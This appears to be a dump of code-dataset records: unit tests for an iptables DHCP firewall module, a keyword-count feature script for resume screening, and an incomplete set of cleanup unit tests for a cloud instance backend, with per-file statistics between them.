('-E', firewall.NEW_CHAIN, CONF.firewall.firewall_chain)
]
mock_iptables.side_effect = [None, None, RuntimeError()]
self.assertRaises(RuntimeError, firewall.update_filters,
mock_get_client)
# check caching
mock_iptables.reset_mock()
mock_iptables.side_effect = None
firewall.update_filters(mock_get_client)
call_args_list = mock_iptables.call_args_list
for (args, call) in zip(update_filters_expected_args,
call_args_list):
self.assertEqual(args, call[0])
def test_update_filters_args_node_not_found_hook(self, mock_call,
mock_get_client,
mock_iptables):
# DHCP should be always opened if node_not_found hook is set
CONF.set_override('node_not_found_hook', 'enroll', 'processing')
firewall.init()
update_filters_expected_args = [
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-N', CONF.firewall.firewall_chain),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-F', firewall.NEW_CHAIN),
('-X', firewall.NEW_CHAIN),
('-N', firewall.NEW_CHAIN),
('-A', firewall.NEW_CHAIN, '-j', 'ACCEPT'),
('-I', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-E', firewall.NEW_CHAIN, CONF.firewall.firewall_chain)
]
firewall.update_filters()
call_args_list = mock_iptables.call_args_list
for (args, call) in zip(update_filters_expected_args,
call_args_list):
self.assertEqual(args, call[0])
def test_update_filters_args_no_introspection(self, mock_call,
mock_get_client,
mock_iptables):
firewall.init()
firewall.BLACKLIST_CACHE = ['foo']
mock_get_client.return_value.port.list.return_value = [
mock.Mock(address='foobar')]
update_filters_expected_args = [
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-N', CONF.firewall.firewall_chain),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-F', firewall.NEW_CHAIN),
('-X', firewall.NEW_CHAIN),
('-N', firewall.NEW_CHAIN),
('-A', firewall.NEW_CHAIN, '-j', 'REJECT'),
('-I', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-E', firewall.NEW_CHAIN, CONF.firewall.firewall_chain)
]
firewall.update_filters()
call_args_list = mock_iptables.call_args_list
for (args, call) in zip(update_filters_expected_args,
call_args_list):
self.assertEqual(args, call[0])
self.assertIsNone(firewall.BLACKLIST_CACHE)
# Check caching enabled flag
mock_iptables.reset_mock()
firewall.update_filters()
self.assertFalse(mock_iptables.called)
# Adding a node changes it back
node_cache.add_node(self.node.uuid, state=istate.States.starting,
bmc_address='1.2.3.4')
mock_iptables.reset_mock()
firewall.update_filters()
mock_iptables.assert_any_call('-A', firewall.NEW_CHAIN, '-j', 'ACCEPT')
self.assertEqual({'foobar'}, firewall.BLACKLIST_CACHE)
def test_update_filters_infiniband(
self, mock_call, mock_get_client, mock_iptables):
CONF.set_override('ethoib_interfaces', ['eth0'], 'firewall')
active_macs = ['11:22:33:44:55:66', '66:55:44:33:22:11']
expected_rmac = '02:00:00:61:00:02'
ports = [mock.Mock(address=m) for m in active_macs]
ports.append(mock.Mock(address='7c:fe:90:29:24:4f',
extra={'client-id': self.CLIENT_ID},
spec=['address', 'extra']))
mock_get_client.port.list.return_value = ports
node_cache.add_node(self.node.uuid, mac=active_macs,
state=istate.States.finished,
bmc_address='1.2.3.4', foo=None)
firewall.init()
update_filters_expected_args = [
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-N', CONF.firewall.firewall_chain),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-F', firewall.NEW_CHAIN),
('-X', firewall.NEW_CHAIN),
('-N', firewall.NEW_CHAIN),
# Blacklist
('-A', firewall.NEW_CHAIN, '-m', 'mac', '--mac-source',
expected_rmac, '-j', 'DROP'),
('-A', firewall.NEW_CHAIN, '-j', 'ACCEPT'),
('-I', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-E', firewall.NEW_CHAIN, CONF.firewall.firewall_chain)
]
fileobj = mock.mock_open(read_data=IB_DATA)
with mock.patch('six.moves.builtins.open', fileobj, create=True):
firewall.update_filters(mock_get_client)
call_args_list = mock_iptables.call_args_list
for (args, call) in zip(update_filters_expected_args,
call_args_list):
self.assertEqual(args, call[0])
def test_update_filters_infiniband_no_such_file(
self, mock_call, mock_get_client, mock_iptables):
CONF.set_override('ethoib_interfaces', ['eth0'], 'firewall')
active_macs = ['11:22:33:44:55:66', '66:55:44:33:22:11']
ports = [mock.Mock(address=m) for m in active_macs]
ports.append(mock.Mock(address='7c:fe:90:29:24:4f',
extra={'client-id': self.CLIENT_ID},
spec=['address', 'extra']))
mock_get_client.port.list.return_value = ports
node_cache.add_node(self.node.uuid, mac=active_macs,
state=istate.States.finished,
bmc_address='1.2.3.4', foo=None)
firewall.init()
update_filters_expected_args = [
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-N', CONF.firewall.firewall_chain),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-F', firewall.NEW_CHAIN),
('-X', firewall.NEW_CHAIN),
('-N', firewall.NEW_CHAIN),
# Blacklist
('-A', firewall.NEW_CHAIN, '-m', 'mac', '--mac-source',
'7c:fe:90:29:24:4f', '-j', 'DROP'),
('-A', firewall.NEW_CHAIN, '-j', 'ACCEPT'),
('-I', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-E', firewall.NEW_CHAIN, CONF.firewall.firewall_chain)
]
with mock.patch('six.moves.builtins.open', side_effect=IOError()):
firewall.update_filters(mock_get_client)
call_args_list = mock_iptables.call_args_list
for (args, call) in zip(update_filters_expected_args,
call_args_list):
self.assertEqual(args, call[0])
| 43.049438
| 79
| 0.544501
| 2,215
| 19,157
| 4.483973
| 0.11377
| 0.098268
| 0.120822
| 0.151027
| 0.82501
| 0.806383
| 0.787354
| 0.77648
| 0.757652
| 0.740234
| 0
| 0.026133
| 0.294879
| 19,157
| 444
| 80
| 43.146396
| 0.709135
| 0.041865
| 0
| 0.808451
| 0
| 0.008451
| 0.126023
| 0.016858
| 0
| 0
| 0
| 0
| 0.056338
| 1
| 0.033803
| false
| 0
| 0.019718
| 0
| 0.059155
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
389d1ea13b11a72839582de319d9905e3c7d402b
| 10,277
|
py
|
Python
|
src/Manual feature Extraction approch/features.py
|
Bakar31/Hire-The-Perfect-Candidate
|
ab9071eefefbe4d0df10e82dce5707f6c094ebe1
|
[
"Apache-2.0"
] | 2
|
2021-09-10T18:22:39.000Z
|
2021-10-05T18:28:19.000Z
|
src/Manual feature Extraction approch/features.py
|
Bakar31/Hire-The-Perfect-Candidate
|
ab9071eefefbe4d0df10e82dce5707f6c094ebe1
|
[
"Apache-2.0"
] | null | null | null |
src/Manual feature Extraction approch/features.py
|
Bakar31/Hire-The-Perfect-Candidate
|
ab9071eefefbe4d0df10e82dce5707f6c094ebe1
|
[
"Apache-2.0"
] | null | null | null |
import re
from preparing_to_train import train_df, test_df
# train features
train_df['words_counts'] = train_df['resumes'].apply(lambda x: len(str(x).split()))
train_df['char_counts'] = train_df['resumes'].apply(lambda x: len(str(x)))
train_df['avg_word_len'] = train_df['char_counts']/train_df['words_counts']
train_df['ml_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('machine learning', x)))
train_df['ml_engineer_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('machine learning engineer', x)))
train_df['analytics_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('analytics', x)))
train_df['degree_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('master degree', x)))
train_df['degree_counts_2'] = train_df['resumes'].apply(lambda x: len(re.findall('msc', x)))
train_df['degree_counts_3'] = train_df['resumes'].apply(lambda x: len(re.findall('degree', x)))
train_df['deep_learning_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('deep learning', x)))
train_df['tf_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('tensorflow', x)))
train_df['neural_network_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('neural network', x)))
train_df['nlp_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('natural language processing', x)))
train_df['nlp_counts_2'] = train_df['resumes'].apply(lambda x: len(re.findall('nlp', x)))
train_df['pyspark_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('pyspark', x)))
train_df['hadoop_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('hadoop', x)))
train_df['data_analysis_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('data analysis', x)))
train_df['lustering_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('clustering', x)))
train_df['lr_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('logistic regression', x)))
train_df['classification_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('classification', x)))
train_df['sk_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('sciKit learn', x)))
train_df['pytorch_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('pytorch', x)))
train_df['cnn_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('cnn', x)))
train_df['rnn_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('rnn', x)))
train_df['gans_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('gans', x)))
train_df['nltk_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('nltk', x)))
train_df['spacy_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('spacy', x)))
train_df['transformer_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('transformer', x)))
train_df['django_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('django', x)))
train_df['research_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('researching', x)))
train_df['ai_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('artificial intelligence', x)))
train_df['algorithm_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('algorithm', x)))
train_df['degree_counts_4'] = train_df['resumes'].apply(lambda x: len(re.findall('bachelor degree', x)))
train_df['np_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('numpy', x)))
train_df['pd_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('pandas', x)))
train_df['plt_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('matplotlib', x)))
train_df['sns_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('seaborn', x)))
train_df['keras_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('keras', x)))
train_df['bs_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('beautiful soup', x)))
train_df['bigdata_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('big data', x)))
train_df['ds_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('data science', x)))
train_df['fe_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('feature engineering', x)))
train_df['cv_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('opencv', x)))
train_df['od_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('object detection', x)))
train_df['cvision_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('computer vision', x)))
train_df['MongoDB_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('mongodb', x)))
train_df['NoSQL_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('nosql', x)))
train_df['GraphQL_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('graphql', x)))
train_df['SQL_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('sql', x)))
train_df['Firebase_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('firebase', x)))
train_df['AWS_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('aws', x)))
train_df['Azure_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('azure', x)))
train_df['gcp_counts'] = train_df['resumes'].apply(lambda x: len(re.findall('google cloud platform', x)))
# test features
test_df['words_counts'] = test_df['resumes'].apply(lambda x: len(str(x).split()))
test_df['char_counts'] = test_df['resumes'].apply(lambda x: len(str(x)))
test_df['avg_word_len'] = test_df['char_counts']/train_df['words_counts']
test_df['ml_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('machine learning', x)))
test_df['ml_engineer_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('machine learning engineer', x)))
test_df['analytics_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('analytics', x)))
test_df['degree_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('master degree', x)))
test_df['degree_counts_2'] = test_df['resumes'].apply(lambda x: len(re.findall('msc', x)))
test_df['degree_counts_3'] = test_df['resumes'].apply(lambda x: len(re.findall('degree', x)))
test_df['deep_learning_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('deep learning', x)))
test_df['tf_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('tensorflow', x)))
test_df['neural_network_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('neural network', x)))
test_df['nlp_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('natural language processing', x)))
test_df['nlp_counts_2'] = test_df['resumes'].apply(lambda x: len(re.findall('nlp', x)))
test_df['pyspark_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('pyspark', x)))
test_df['hadoop_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('hadoop', x)))
test_df['data_analysis_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('data analysis', x)))
test_df['lustering_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('clustering', x)))
test_df['lr_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('logistic regression', x)))
test_df['classification_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('classification', x)))
test_df['sk_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('sciKit learn', x)))
test_df['pytorch_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('pytorch', x)))
test_df['cnn_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('cnn', x)))
test_df['rnn_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('rnn', x)))
test_df['gans_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('gans', x)))
test_df['nltk_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('nltk', x)))
test_df['spacy_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('spacy', x)))
test_df['transformer_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('transformer', x)))
test_df['django_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('django', x)))
test_df['research_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('researching', x)))
test_df['ai_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('artificial intelligence', x)))
test_df['algorithm_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('algorithm', x)))
test_df['degree_counts_4'] = test_df['resumes'].apply(lambda x: len(re.findall('bachelor degree', x)))
test_df['np_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('numpy', x)))
test_df['pd_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('pandas', x)))
test_df['plt_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('matplotlib', x)))
test_df['sns_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('seaborn', x)))
test_df['keras_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('keras', x)))
test_df['bs_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('beautiful soup', x)))
test_df['bigdata_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('big data', x)))
test_df['ds_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('data science', x)))
test_df['fe_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('feature engineering', x)))
test_df['cv_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('opencv', x)))
test_df['od_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('object detection', x)))
test_df['cvision_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('computer vision', x)))
test_df['MongoDB_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('mongodb', x)))
test_df['NoSQL_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('nosql', x)))
test_df['GraphQL_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('graphql', x)))
test_df['SQL_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('sql', x)))
test_df['Firebase_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('firebase', x)))
test_df['AWS_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('aws', x)))
test_df['Azure_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('azure', x)))
test_df['gcp_counts'] = test_df['resumes'].apply(lambda x: len(re.findall('google cloud platform', x)))
print(train_df.shape)
print(test_df.shape)
| 87.837607
| 117
| 0.718011
| 1,661
| 10,277
| 4.232992
| 0.066225
| 0.109515
| 0.207083
| 0.295833
| 0.828901
| 0.804011
| 0.799033
| 0.790499
| 0.790499
| 0.786517
| 0
| 0.000834
| 0.066848
| 10,277
| 117
| 118
| 87.837607
| 0.732325
| 0.002725
| 0
| 0
| 0
| 0
| 0.304284
| 0.008198
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.018182
| 0
| 0.018182
| 0.018182
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
38a8fe3f1a673cbf3b40b00aa332df49c2d3e1ea
| 29,781
|
py
|
Python
|
appengine/gce-backend/cleanup_test.py
|
Swift1313/luci-py
|
0a4fdfc25f89833026be6a8b29c0a27b8f3c5fc4
|
[
"Apache-2.0"
] | null | null | null |
appengine/gce-backend/cleanup_test.py
|
Swift1313/luci-py
|
0a4fdfc25f89833026be6a8b29c0a27b8f3c5fc4
|
[
"Apache-2.0"
] | null | null | null |
appengine/gce-backend/cleanup_test.py
|
Swift1313/luci-py
|
0a4fdfc25f89833026be6a8b29c0a27b8f3c5fc4
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# Copyright 2016 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Unit tests for cleanup.py."""
import unittest
import test_env
test_env.setup_test_env()
from google.appengine.ext import ndb
from components import net
from test_support import test_case
import cleanup
import instance_group_managers
import instance_templates
import instances
import models
class CheckDeletedInstanceTest(test_case.TestCase):
"""Tests for cleanup.check_deleted_instance."""
def test_entity_not_found(self):
"""Ensures nothing happens when the entity is not found."""
key = ndb.Key(models.Instance, 'fake-key')
cleanup.check_deleted_instance(key)
self.failIf(key.get())
def test_not_pending_deletion(self):
"""Ensures nothing happens when the entity is not pending deletion."""
key = models.Instance(
key=instances.get_instance_key(
'base-name',
'revision',
'zone',
'instance-name',
),
url='url',
).put()
cleanup.check_deleted_instance(key)
self.failIf(key.get().deleted)
def test_no_url(self):
"""Ensures nothing happens when the entity has no URL."""
key = models.Instance(
key=instances.get_instance_key(
'base-name',
'revision',
'zone',
'instance-name',
),
pending_deletion=True,
).put()
cleanup.check_deleted_instance(key)
self.failIf(key.get().deleted)
def test_exists(self):
"""Ensures nothing happens when the instance still exists."""
def json_request(*_args, **_kwargs):
return {}
self.mock(cleanup.net, 'json_request', json_request)
key = models.Instance(
key=instances.get_instance_key(
'base-name',
'revision',
'zone',
'instance-name',
),
pending_deletion=True,
url='url',
).put()
cleanup.check_deleted_instance(key)
self.failIf(key.get().deleted)
def test_deleted(self):
"""Ensures the entity is marked deleted when the instance doesn't exists."""
def json_request(*_args, **_kwargs):
raise net.NotFoundError('404', 404, '404')
def send_machine_event(*_args, **_kwargs):
pass
self.mock(cleanup.net, 'json_request', json_request)
self.mock(cleanup.metrics, 'send_machine_event', send_machine_event)
key = models.Instance(
key=instances.get_instance_key(
'base-name',
'revision',
'zone',
'instance-name',
),
pending_deletion=True,
url='url',
).put()
cleanup.check_deleted_instance(key)
self.failUnless(key.get().deleted)
class CleanupDeletedInstanceTest(test_case.TestCase):
"""Tests for cleanup.cleanup_deleted_instance."""
def test_entity_not_found(self):
"""Ensures nothing happens when the entity is not found."""
key = ndb.Key(models.Instance, 'fake-key')
cleanup.cleanup_deleted_instance(key)
self.failIf(key.get())
def test_not_deleted(self):
"""Ensures nothing happens when the instance is not deleted."""
key = models.Instance(
key=instances.get_instance_key(
'base-name',
'revision',
'zone',
'instance-name',
),
deleted=False,
).put()
cleanup.cleanup_deleted_instance(key)
self.failUnless(key.get())
def test_deletes(self):
"""Ensures the entity is deleted."""
def send_machine_event(*_args, **_kwargs):
pass
self.mock(cleanup.metrics, 'send_machine_event', send_machine_event)
key = models.Instance(
key=instances.get_instance_key(
'base-name',
'revision',
'zone',
'instance-name',
),
deleted=True,
).put()
cleanup.cleanup_deleted_instance(key)
self.failIf(key.get())
class CleanupDrainedInstanceTest(test_case.TestCase):
"""Tests for cleanup.cleanup_drained_instance."""
def test_entity_not_found(self):
"""Ensures nothing happens when the entity is not found."""
def json_request(*_args, **_kwargs):
self.fail('json_request called')
self.mock(cleanup.net, 'json_request', json_request)
key = ndb.Key(models.Instance, 'fake-key')
cleanup.cleanup_drained_instance(key)
self.failIf(key.get())
def test_url_unspecified(self):
"""Ensures nothing happens when the entity has no URL."""
def json_request(*_args, **_kwargs):
self.fail('json_request called')
self.mock(cleanup.net, 'json_request', json_request)
key = instances.get_instance_key(
'base-name',
'revision',
'zone',
'instance-name',
)
key = models.Instance(
key=key,
instance_group_manager=instances.get_instance_group_manager_key(key),
).put()
models.InstanceGroupManager(
key=instances.get_instance_group_manager_key(key),
).put()
models.InstanceTemplateRevision(
key=instances.get_instance_group_manager_key(key).parent(),
).put()
models.InstanceTemplate(
key=instances.get_instance_group_manager_key(key).parent().parent(),
).put()
cleanup.cleanup_drained_instance(key)
self.failIf(key.get().deleted)
def test_parent_unspecified(self):
"""Ensures nothing happens when the parent doesn't exist."""
def json_request(*_args, **_kwargs):
self.fail('json_request called')
self.mock(cleanup.net, 'json_request', json_request)
key = instances.get_instance_key(
'base-name',
'revision',
'zone',
'instance-name',
)
key = models.Instance(
key=key,
instance_group_manager=instances.get_instance_group_manager_key(key),
url='url',
).put()
models.InstanceTemplateRevision(
key=instances.get_instance_group_manager_key(key).parent(),
).put()
models.InstanceTemplate(
key=instances.get_instance_group_manager_key(key).parent().parent(),
).put()
cleanup.cleanup_drained_instance(key)
self.failIf(key.get().deleted)
def test_grandparent_unspecified(self):
"""Ensures nothing happens when the grandparent doesn't exist."""
def json_request(*_args, **_kwargs):
self.fail('json_request called')
self.mock(cleanup.net, 'json_request', json_request)
key = instances.get_instance_key(
'base-name',
'revision',
'zone',
'instance-name',
)
key = models.Instance(
key=key,
instance_group_manager=instances.get_instance_group_manager_key(key),
url='url',
).put()
models.InstanceGroupManager(
key=instances.get_instance_group_manager_key(key),
).put()
models.InstanceTemplate(
key=instances.get_instance_group_manager_key(key).parent().parent(),
).put()
cleanup.cleanup_drained_instance(key)
self.failIf(key.get().deleted)
def test_root_unspecified(self):
"""Ensures nothing happens when the parent doesn't exist."""
key = instances.get_instance_key(
'base-name',
'revision',
'zone',
'instance-name',
)
key = models.Instance(
key=key,
instance_group_manager=instances.get_instance_group_manager_key(key),
url='url',
).put()
models.InstanceGroupManager(
key=instances.get_instance_group_manager_key(key),
).put()
models.InstanceTemplateRevision(
key=instances.get_instance_group_manager_key(key).parent(),
).put()
cleanup.cleanup_drained_instance(key)
self.failIf(key.get().deleted)
def test_not_drained(self):
"""Ensures nothing happens when the parent is not drained."""
def json_request(*_args, **_kwargs):
self.fail('json_request called')
self.mock(cleanup.net, 'json_request', json_request)
key = instances.get_instance_key(
'base-name',
'revision',
'zone',
'instance-name',
)
key = models.Instance(
key=key,
instance_group_manager=instances.get_instance_group_manager_key(key),
url='url',
).put()
models.InstanceGroupManager(
key=instances.get_instance_group_manager_key(key),
).put()
models.InstanceTemplateRevision(
key=instances.get_instance_group_manager_key(key).parent(),
).put()
models.InstanceTemplate(
key=instances.get_instance_group_manager_key(key).parent().parent(),
).put()
cleanup.cleanup_drained_instance(key)
self.failIf(key.get().deleted)
def test_drained(self):
"""Ensures the entity is marked deleted when the parent is drained."""
def json_request(*_args, **_kwargs):
raise net.NotFoundError('404', 404, '404')
def send_machine_event(*_args, **_kwargs):
pass
self.mock(cleanup.net, 'json_request', json_request)
self.mock(cleanup.metrics, 'send_machine_event', send_machine_event)
key = instances.get_instance_key(
'base-name',
'revision',
'zone',
'instance-name',
)
key = models.Instance(
key=key,
instance_group_manager=instances.get_instance_group_manager_key(key),
url='url',
).put()
models.InstanceGroupManager(
key=instances.get_instance_group_manager_key(key),
).put()
models.InstanceTemplateRevision(
key=instances.get_instance_group_manager_key(key).parent(),
drained=[
instances.get_instance_group_manager_key(key),
],
).put()
models.InstanceTemplate(
key=instances.get_instance_group_manager_key(key).parent().parent(),
).put()
cleanup.cleanup_drained_instance(key)
self.failUnless(key.get().deleted)
def test_implicitly_drained(self):
"""Ensures the entity is marked deleted when the grandparent is drained."""
def json_request(*_args, **_kwargs):
raise net.NotFoundError('404', 404, '404')
def send_machine_event(*_args, **_kwargs):
pass
self.mock(cleanup.net, 'json_request', json_request)
self.mock(cleanup.metrics, 'send_machine_event', send_machine_event)
key = instances.get_instance_key(
'base-name',
'revision',
'zone',
'instance-name',
)
key = models.Instance(
key=key,
instance_group_manager=instances.get_instance_group_manager_key(key),
url='url',
).put()
models.InstanceGroupManager(
key=instances.get_instance_group_manager_key(key),
).put()
models.InstanceTemplateRevision(
key=instances.get_instance_group_manager_key(key).parent(),
).put()
models.InstanceTemplate(
key=instances.get_instance_group_manager_key(key).parent().parent(),
drained=[
instances.get_instance_group_manager_key(key).parent(),
],
).put()
cleanup.cleanup_drained_instance(key)
self.failUnless(key.get().deleted)
class CleanupInstanceGroupManagersTest(test_case.TestCase):
"""Tests for cleanup.cleanup_instance_group_managers."""
def test_no_entities(self):
def get_drained_instance_group_managers(*_args, **_kwargs):
return []
@ndb.tasklet
def delete_instance_group_manager(*_args, **_kwargs):
self.fail('delete_instance_group_manager called')
self.mock(
cleanup.instance_group_managers,
'get_drained_instance_group_managers',
get_drained_instance_group_managers,
)
self.mock(
cleanup, 'delete_instance_group_manager', delete_instance_group_manager)
cleanup.cleanup_instance_group_managers()
self.failIf(models.InstanceGroupManager.query().count())
def test_deletes(self):
def get_drained_instance_group_managers(*_args, **_kwargs):
return [
ndb.Key(models.InstanceGroupManager, 'fake-key-1'),
ndb.Key(models.InstanceGroupManager, 'fake-key-3'),
ndb.Key(models.InstanceGroupManager, 'fake-key-4'),
]
@ndb.tasklet
def delete_instance_group_manager(key):
yield key.delete_async()
self.mock(
cleanup.instance_group_managers,
'get_drained_instance_group_managers',
get_drained_instance_group_managers,
)
self.mock(
cleanup, 'delete_instance_group_manager', delete_instance_group_manager)
models.InstanceGroupManager(
key=ndb.Key(models.InstanceGroupManager, 'fake-key-1'),
).put()
models.InstanceGroupManager(
key=ndb.Key(models.InstanceGroupManager, 'fake-key-2'),
).put()
models.InstanceGroupManager(
key=ndb.Key(models.InstanceGroupManager, 'fake-key-3'),
).put()
models.InstanceGroupManager(
key=ndb.Key(models.InstanceGroupManager, 'fake-key-4'),
).put()
cleanup.cleanup_instance_group_managers(max_concurrent=2)
self.failIf(ndb.Key(models.InstanceGroupManager, 'fake-key-1').get())
self.failUnless(ndb.Key(models.InstanceGroupManager, 'fake-key-2').get())
self.failIf(ndb.Key(models.InstanceGroupManager, 'fake-key-3').get())
self.failIf(ndb.Key(models.InstanceGroupManager, 'fake-key-4').get())
class CleanupInstanceTemplateRevisionsTest(test_case.TestCase):
"""Tests for cleanup.cleanup_instance_template_revisions."""
def test_no_entities(self):
def get_drained_instance_template_revisions(*_args, **_kwargs):
return []
@ndb.tasklet
def delete_instance_template_revision(*_args, **_kwargs):
